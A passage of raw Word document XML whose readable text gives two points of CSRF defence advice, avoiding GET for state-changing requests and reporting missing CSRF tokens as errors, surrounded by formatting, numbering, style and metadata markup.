          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>As a best practice, never use GET requests for state-changing operations. Always use POST requests or other appropriate HTTP methods for such operations. This reduces the risk of CSRF attacks through methods like URL sharing or forced browsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78AB9B" w14:textId="0B253CE9" w:rsidR="002F152E" w:rsidRPr="00B35C47" w:rsidRDefault="00146091" w:rsidP="00E85381">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Proper Error Handling:</w:t>
      </w:r>
      <w:r w:rsidR="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">The application should not silently ignore missing CSRF tokens or treat their absence as valid input. Instead, it should respond with appropriate error messages or warnings to the user. This can alert users to potential attacks or misconfigurations and prevent unexpected </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B35C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the application.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F152E" w:rsidRPr="00B35C47" w:rsidSect="002F15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B22D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70980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1A0C38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78723420"/>
    <w:lvl w:ilvl="0" w:tplc="2F346B76">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>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901061"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E858FE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EF1E49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C08091DC"/>
    <w:lvl w:ilvl="0" w:tplc="26D401BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>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FE702B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15E4504E"/>
    <w:lvl w:ilvl="0" w:tplc="EB68B4B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b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F30063"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="412CAB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0B5CEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC904E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8083980">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1806852917">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1019623095">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="152180400">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1129974817">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1883975352">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="18752697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2E"/>
    <w:rsid w:val="000149B5"/>
    <w:rsid w:val="00017B26"/>
    <w:rsid w:val="00017D37"/>
    <w:rsid w:val="000316DD"/>
    <w:rsid w:val="000564D4"/>
    <w:rsid w:val="00087DD8"/>
    <w:rsid w:val="00093FF4"/>
    <w:rsid w:val="000B5333"/>
    <w:rsid w:val="000D5093"/>
    <w:rsid w:val="000D7CE5"/>
    <w:rsid w:val="000E4A5B"/>
    <w:rsid w:val="000F0291"/>
    <w:rsid w:val="000F4FE7"/>
    <w:rsid w:val="000F5F61"/>
    <w:rsid w:val="001007B5"/>
    <w:rsid w:val="00115586"/>
    <w:rsid w:val="00131AF3"/>
    <w:rsid w:val="00146091"/>
    <w:rsid w:val="00146DDF"/>
    <w:rsid w:val="0014796E"/>
    <w:rsid w:val="0015780E"/>
    <w:rsid w:val="00165B56"/>
    <w:rsid w:val="001768CB"/>
    <w:rsid w:val="00193EED"/>
    <w:rsid w:val="001E0828"/>
    <w:rsid w:val="001E5754"/>
    <w:rsid w:val="001E5BF4"/>
    <w:rsid w:val="001E698E"/>
    <w:rsid w:val="001F222F"/>
    <w:rsid w:val="001F478F"/>
    <w:rsid w:val="00206207"/>
    <w:rsid w:val="00212AC8"/>
    <w:rsid w:val="002207B3"/>
    <w:rsid w:val="0022338E"/>
    <w:rsid w:val="00226D86"/>
    <w:rsid w:val="00245816"/>
    <w:rsid w:val="00247E82"/>
    <w:rsid w:val="002519AC"/>
    <w:rsid w:val="0026137F"/>
    <w:rsid w:val="00262D06"/>
    <w:rsid w:val="0028480B"/>
    <w:rsid w:val="00290689"/>
    <w:rsid w:val="002A1A1E"/>
    <w:rsid w:val="002A5040"/>
    <w:rsid w:val="002A7B99"/>
    <w:rsid w:val="002B0D4E"/>
    <w:rsid w:val="002C1EC0"/>
    <w:rsid w:val="002D2C78"/>
    <w:rsid w:val="002F152E"/>
    <w:rsid w:val="002F3625"/>
    <w:rsid w:val="002F54EB"/>
    <w:rsid w:val="0030439C"/>
    <w:rsid w:val="00317C2D"/>
    <w:rsid w:val="003202F7"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="0033120F"/>
    <w:rsid w:val="003358E4"/>
    <w:rsid w:val="0036197C"/>
    <w:rsid w:val="00380DB3"/>
    <w:rsid w:val="0038106E"/>
    <w:rsid w:val="00385CF9"/>
    <w:rsid w:val="00392C30"/>
    <w:rsid w:val="003978F4"/>
    <w:rsid w:val="003A5F44"/>
    <w:rsid w:val="003C1DDC"/>
    <w:rsid w:val="003D523D"/>
    <w:rsid w:val="00437C9B"/>
    <w:rsid w:val="00454915"/>
    <w:rsid w:val="00466759"/>
    <w:rsid w:val="00482A06"/>
    <w:rsid w:val="00495017"/>
    <w:rsid w:val="004C039A"/>
    <w:rsid w:val="004C075B"/>
    <w:rsid w:val="004C3608"/>
    <w:rsid w:val="004C37DD"/>
    <w:rsid w:val="004E26E8"/>
    <w:rsid w:val="005036F1"/>
    <w:rsid w:val="00513F5E"/>
    <w:rsid w:val="0052488A"/>
    <w:rsid w:val="00532A89"/>
    <w:rsid w:val="00554D32"/>
    <w:rsid w:val="00557B86"/>
    <w:rsid w:val="005657B0"/>
    <w:rsid w:val="0057090A"/>
    <w:rsid w:val="00572214"/>
    <w:rsid w:val="00591996"/>
    <w:rsid w:val="0059201C"/>
    <w:rsid w:val="005A5FE5"/>
    <w:rsid w:val="005B588A"/>
    <w:rsid w:val="005B750D"/>
    <w:rsid w:val="005C275F"/>
    <w:rsid w:val="005C5A61"/>
    <w:rsid w:val="005E6AA5"/>
    <w:rsid w:val="005E7D42"/>
    <w:rsid w:val="006009AF"/>
    <w:rsid w:val="00620059"/>
    <w:rsid w:val="00626274"/>
    <w:rsid w:val="00631DB6"/>
    <w:rsid w:val="00640BC6"/>
    <w:rsid w:val="00644335"/>
    <w:rsid w:val="00675428"/>
    <w:rsid w:val="00682DCE"/>
    <w:rsid w:val="00686C72"/>
    <w:rsid w:val="00692320"/>
    <w:rsid w:val="006B684D"/>
    <w:rsid w:val="006B7049"/>
    <w:rsid w:val="006C0B72"/>
    <w:rsid w:val="006C25F7"/>
    <w:rsid w:val="006C26C7"/>
    <w:rsid w:val="006E57C3"/>
    <w:rsid w:val="00705B8A"/>
    <w:rsid w:val="00713B95"/>
    <w:rsid w:val="007236F6"/>
    <w:rsid w:val="007244DD"/>
    <w:rsid w:val="0074089A"/>
    <w:rsid w:val="00774583"/>
    <w:rsid w:val="00782EF7"/>
    <w:rsid w:val="00792BB3"/>
    <w:rsid w:val="007977EA"/>
    <w:rsid w:val="007B5BBE"/>
    <w:rsid w:val="007C289E"/>
    <w:rsid w:val="007F5950"/>
    <w:rsid w:val="008264C3"/>
    <w:rsid w:val="00840938"/>
    <w:rsid w:val="00846E37"/>
    <w:rsid w:val="00857CA7"/>
    <w:rsid w:val="0086200C"/>
    <w:rsid w:val="00864B78"/>
    <w:rsid w:val="008666AA"/>
    <w:rsid w:val="008862F8"/>
    <w:rsid w:val="00893E8D"/>
    <w:rsid w:val="008B60AF"/>
    <w:rsid w:val="008C0C10"/>
    <w:rsid w:val="008C2054"/>
    <w:rsid w:val="008D2466"/>
    <w:rsid w:val="008D3233"/>
    <w:rsid w:val="008E4165"/>
    <w:rsid w:val="008F18C8"/>
    <w:rsid w:val="008F2B4A"/>
    <w:rsid w:val="008F30FF"/>
    <w:rsid w:val="008F755A"/>
    <w:rsid w:val="008F76D3"/>
    <w:rsid w:val="00900668"/>
    <w:rsid w:val="00903595"/>
    <w:rsid w:val="00914F8A"/>
    <w:rsid w:val="00916E37"/>
    <w:rsid w:val="00917626"/>
    <w:rsid w:val="00921403"/>
    <w:rsid w:val="009303B4"/>
    <w:rsid w:val="00933DCA"/>
    <w:rsid w:val="0094184C"/>
    <w:rsid w:val="00950F42"/>
    <w:rsid w:val="00962C00"/>
    <w:rsid w:val="009662AA"/>
    <w:rsid w:val="00970BF8"/>
    <w:rsid w:val="009764B7"/>
    <w:rsid w:val="009F411A"/>
    <w:rsid w:val="00A01591"/>
    <w:rsid w:val="00A062A5"/>
    <w:rsid w:val="00A071F4"/>
    <w:rsid w:val="00A35B3A"/>
    <w:rsid w:val="00A44CF7"/>
    <w:rsid w:val="00A834AE"/>
    <w:rsid w:val="00A83ED9"/>
    <w:rsid w:val="00AA2AE9"/>
    <w:rsid w:val="00AF3753"/>
    <w:rsid w:val="00B026F1"/>
    <w:rsid w:val="00B03E11"/>
    <w:rsid w:val="00B112CB"/>
    <w:rsid w:val="00B20FC9"/>
    <w:rsid w:val="00B2193E"/>
    <w:rsid w:val="00B33405"/>
    <w:rsid w:val="00B35C47"/>
    <w:rsid w:val="00B45D8B"/>
    <w:rsid w:val="00B47073"/>
    <w:rsid w:val="00B47E54"/>
    <w:rsid w:val="00B57949"/>
    <w:rsid w:val="00BA7C57"/>
    <w:rsid w:val="00BB5CA6"/>
    <w:rsid w:val="00BC1739"/>
    <w:rsid w:val="00BC3984"/>
    <w:rsid w:val="00BC7780"/>
    <w:rsid w:val="00BD3EE9"/>
    <w:rsid w:val="00BD4233"/>
    <w:rsid w:val="00BE0CC0"/>
    <w:rsid w:val="00BF2868"/>
    <w:rsid w:val="00C44177"/>
    <w:rsid w:val="00C44B26"/>
    <w:rsid w:val="00C4551B"/>
    <w:rsid w:val="00C46CCB"/>
    <w:rsid w:val="00C47C8F"/>
    <w:rsid w:val="00C61158"/>
    <w:rsid w:val="00C74415"/>
    <w:rsid w:val="00C84C96"/>
    <w:rsid w:val="00CB1CA7"/>
    <w:rsid w:val="00CB43ED"/>
    <w:rsid w:val="00CD3D3A"/>
    <w:rsid w:val="00CF4E92"/>
    <w:rsid w:val="00D043EB"/>
    <w:rsid w:val="00D46E1C"/>
    <w:rsid w:val="00D64007"/>
    <w:rsid w:val="00D70127"/>
    <w:rsid w:val="00D76CFA"/>
    <w:rsid w:val="00D82D12"/>
    <w:rsid w:val="00DA01A0"/>
    <w:rsid w:val="00DA1896"/>
    <w:rsid w:val="00DB3836"/>
    <w:rsid w:val="00DC6ED7"/>
    <w:rsid w:val="00DD59AE"/>
    <w:rsid w:val="00DF3E68"/>
    <w:rsid w:val="00E014E9"/>
    <w:rsid w:val="00E036C2"/>
    <w:rsid w:val="00E050CA"/>
    <w:rsid w:val="00E3082B"/>
    <w:rsid w:val="00E31496"/>
    <w:rsid w:val="00E35637"/>
    <w:rsid w:val="00E36C66"/>
    <w:rsid w:val="00E64623"/>
    <w:rsid w:val="00E71825"/>
    <w:rsid w:val="00E86B4D"/>
    <w:rsid w:val="00EA6346"/>
    <w:rsid w:val="00EA760C"/>
    <w:rsid w:val="00EC1C27"/>
    <w:rsid w:val="00EC37BE"/>
    <w:rsid w:val="00EF5628"/>
    <w:rsid w:val="00F24ADA"/>
    <w:rsid w:val="00F443AB"/>
    <w:rsid w:val="00F455FA"/>
    <w:rsid w:val="00F51D87"/>
    <w:rsid w:val="00F63D6F"/>
    <w:rsid w:val="00F748E3"/>
    <w:rsid w:val="00F9385F"/>
    <w:rsid w:val="00F950C9"/>
    <w:rsid w:val="00FB1ED0"/>
    <w:rsid w:val="00FB7477"/>
    <w:rsid w:val="00FB7C64"/>
    <w:rsid w:val="00FC69AB"/>
    <w:rsid w:val="00FD6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8287A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF664686-189A-45D2-B020-76389DB09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152E"/>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2F152E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0057090A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004E26E8"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004E26E8"/>
    <w:rPr>
      <w:rFonts w:ascii="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7808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="305746308">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1701204916">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="174961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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T11:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T09:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>